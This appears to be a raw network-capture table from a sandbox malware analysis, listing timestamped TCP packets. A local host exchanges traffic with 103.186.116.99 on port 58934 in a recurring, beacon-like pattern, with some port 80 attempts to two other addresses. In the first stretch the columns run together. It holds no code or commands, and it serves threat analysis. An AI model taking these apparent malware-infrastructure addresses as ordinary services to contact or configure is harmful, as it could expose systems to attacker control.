                                                                                                                                Oct 1, 2024 09:25:36.873919010 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873927116 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873934031 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873941898 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.873950005 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.873981953 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874320030 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874335051 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874351025 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874368906 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874397039 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874454975 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874475956 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874491930 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290647030 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290662050 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290667057 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290676117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290690899 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290705919 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290708065 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290719032 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290730000 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290735006 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290750027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290762901 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290764093 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290779114 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290793896 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290808916 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290810108 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290826082 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290848017 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.291270018 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291285038 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291299105 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291320086 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291328907 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.291335106 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291364908 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.291431904 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.292576075 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.612956047 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.617810965 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.617913008 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.617985964 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.618060112 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.622723103 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.622733116 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.622819901 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.622917891 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.622984886 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.623002052 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.623053074 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.627681971 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627700090 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627746105 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627754927 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.627790928 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627799988 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627827883 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627876997 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627885103 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.628881931 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.632591963 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.632667065 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.641346931 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.643795967 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.643888950 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:51.773540020 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:51.775284052 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:51.780085087 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:21.815222979 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:21.817013025 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:26:21.821959972 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:37.531275988 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:37.857711077 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:38.559745073 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:39.854585886 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:42.257010937 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:47.078071117 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:51.900825977 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:51.901937962 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:26:51.906709909 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:56.731817007 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:27:05.140791893 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:27:21.928277016 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:27:22.162478924 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:27:22.278465986 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:27:22.283329964 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:27:51.927855968 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:27:51.933218002 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:27:51.938134909 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:28:21.947355986 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:28:21.973133087 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:28:21.978177071 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:28:51.946414948 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:28:51.968250990 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:28:51.973165035 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.655421972 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.660398960 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.665508032 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.671997070 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.671997070 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.676841974 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.888407946 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.936168909 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.944411993 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.950104952 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.955338001 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.955338001 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.960997105 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.183356047 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:07.609313965 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.807332993 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:07.874492884 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.890563011 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.894021034 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:07.898971081 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.899017096 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:07.907790899 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.088140965 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.090117931 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.090167999 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.168730021 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.172852039 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.177647114 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.177690029 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.182527065 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.205689907 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.210586071 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.210633993 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.210669041 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.210732937 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.215428114 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.215476990 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.215527058 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.215539932 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.215548038 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.215579987 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.215579987 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.220330000 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.220339060 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.220371008 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.220371008 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.220418930 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.220439911 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.220448017 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.220454931 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.220459938 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.220473051 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.220665932 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.220674038 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.225200891 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.225243092 CEST5893449176103.186.116.99192.168.2.22
Oct 1, 2024 09:29:08.225251913 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:08.225441933 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:08.225449085 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:08.899527073 CEST  49175  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:08.904464006 CEST  58934  49175  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.221718073 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.247251987 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:09.247304916 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:09.252166986 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252208948 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252218008 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252224922 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252233028 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252238035 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252284050 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252420902 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252458096 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.252521992 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.256983042 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257023096 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257056952 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257065058 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257093906 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257148027 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257155895 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257174969 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257184029 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.257272959 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:09.913517952 CEST  49175  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:09.918673038 CEST  58934  49175  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.237299919 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.264758110 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:10.266259909 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:10.269709110 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.269718885 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.269779921 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.269788027 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.269953966 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.269999981 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.270006895 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.270016909 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.270030022 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.270148993 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274605989 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274615049 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274621964 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274629116 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274636030 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274643898 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274651051 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274653912 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274724960 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274733067 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274760962 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274769068 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.274775982 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:10.927526951 CEST  49175  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:10.932698011 CEST  58934  49175  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.250885010 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.275274038 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:11.275327921 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:11.280162096 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280200958 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280209064 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280215025 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280225039 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280231953 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280322075 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280369043 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280375957 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.280384064 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284811974 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284845114 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284918070 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284925938 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284935951 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284943104 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284950018 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284986019 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.284997940 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.285006046 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.285012960 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.285017967 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.285024881 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:11.941562891 CEST  49175  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:11.946465015 CEST  58934  49175  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.277446032 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.299346924 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:12.300826073 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:12.304295063 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304510117 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304522991 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304543018 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304553986 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304578066 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304589033 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304641962 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304655075 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.304666042 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309088945 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309101105 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309313059 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309324980 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309335947 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309350014 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309360981 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309371948 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309392929 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309427977 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309439898 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309472084 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.309483051 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:12.955594063 CEST  49175  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:12.960508108 CEST  58934  49175  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.277102947 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.303600073 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:13.303647041 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:13.308480978 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308490038 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308567047 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308574915 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308624983 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308631897 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308640003 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308705091 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308723927 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.308732033 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313191891 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313205957 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313213110 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313220024 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313229084 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313258886 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313299894 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313330889 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313339949 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313368082 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313415051 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313422918 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.313430071 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:13.969635963 CEST  49175  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:14.027441025 CEST  58934  49175  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.344415903 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.370457888 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:14.370512009 CEST  49176  58934  192.168.2.22    103.186.116.99
Oct 1, 2024 09:29:14.375355005 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375369072 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375377893 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375392914 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375406981 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375452995 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375617981 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375624895 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375633001 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.375705957 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380089045 CEST  58934  49176  103.186.116.99  192.168.2.22
Oct 1, 2024 09:29:14.380153894 CEST  58934  49176  103.186.116.99  192.168.2.22
